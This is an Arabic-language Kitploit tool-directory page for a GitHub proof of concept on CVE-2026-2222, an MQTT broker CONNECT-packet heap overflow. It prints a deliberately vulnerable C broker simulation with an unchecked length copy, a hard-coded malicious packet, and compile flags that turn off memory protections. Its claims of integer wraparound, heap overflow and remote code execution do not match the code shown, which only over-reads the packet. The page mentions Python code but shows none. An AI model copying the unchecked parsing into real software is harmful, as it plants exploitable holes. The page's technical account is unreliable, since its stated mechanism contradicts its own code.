Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-2222-MQTT-Broker-CONNECT-Packet-Heap-Overflow — يعرض تجاوز سعة الكومة CVE-2026-2222 في معالجة حزم MQTT CONNECT باستخدام Broker ضعيف مُحاكى وكود استغلال لإثبات المفهوم لتنفيذ التعليمات البرمجية عن بُعد. | Kitploit
أدوات/GitHubGitHub/george0papasotiriou/cve-2026-2222-mqtt-broker-connect-packet-heap-overflow
أمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليماستغلال الملفات الثنائية
GitHubgeorge0papasotiriou/cve-2026-2222-mqtt-broker-connect-packet-heap-overflow

CVE-2026-2222-MQTT-Broker-CONNECT-Packet-Heap-Overflow

يعرض تجاوز سعة الكومة CVE-2026-2222 في معالجة حزم MQTT CONNECT باستخدام Broker ضعيف مُحاكى وكود استغلال لإثبات المفهوم لتنفيذ التعليمات البرمجية عن بُعد.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 18 أياملم تتم المراجعة بعد

CVE-2026-2222 – تجاوز سعة الكومة في حزمة CONNECT لوسيط MQTT

كود البرنامج (C + Python)

root@kitploit:~
// mqtt_broker_sim.c - Simulated vulnerable MQTT broker
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

struct mqtt_connect {
    char protocol_name[8];
    uint8_t protocol_level;
    uint8_t flags;
    uint16_t keepalive;
    // remaining length field misinterpreted
};

void process_connect(uint8_t *packet, size_t len) {
    // Assume we've parsed fixed header: remaining length = (packet[1] & 0x7F) + ...
    // For demo, we read a 2-byte "remaining length" from packet[1:3] and allocate that many bytes,
    // then copy payload without proper bounds.
    uint16_t remaining_length = (packet[1] << 8) | packet[2]; // should be encoded as variable length, but we misuse
    printf("Allocating %d bytes\n", remaining_length);
    char *buffer = malloc(remaining_length); // if remaining_length is crafted to wrap, small allocation
    // copy payload from packet+3 for remaining_length bytes -> heap overflow if remaining_length > len-3
    memcpy(buffer, packet+3, remaining_length); // overflow
    // process...
    free(buffer);
}

int main() {
    // Crafted malicious packet: remaining_length = 0xFFFF (65535) but actual packet size small
    uint8_t evil[] = {0x10, 0xFF, 0xFF, 0x00, 0x04, 'M','Q','T','T'}; // length 9
    process_connect(evil, sizeof(evil));
    return 0;
}

CVE-2026-2222 – تجاوز سعة الكومة في CONNECT لوسيط MQTT

Severity: Critical

نظرة عامة

يؤدي تجاوز عدد صحيح في تحليل حقل طول الباقي لحزمة MQTT CONNECT إلى تجاوز سعة المخزن المؤقت في الكومة، مما يتيح تنفيذ كود عن بُعد على الوسيط.

تفاصيل الثغرة

  • النوع: تجاوز عدد صحيح / تجاوز سعة المخزن المؤقت في الكومة
  • التأثير: تنفيذ كود عن بُعد على وسيط MQTT، مما يعرّض جميع أجهزة إنترنت الأشياء المتصلة للاختراق.
  • السبب الجذري: يقوم الوسيط بفك ترميز طول الباقي كقيمة 16-بت ويستخدمها مباشرةً في تخصيص الذاكرة والنسخ دون التحقق منها مقابل حجم الحزمة الفعلي.

عرض استغلال الثغرة

قم بتجميع الوسيط الضعيف المُحاكى وتشغيله:

root@kitploit:~
gcc mqtt_broker_sim.c -o mqtt_broker_sim -fno-stack-protector -z execstack
./mqtt_broker_sim
تنزيل الأداة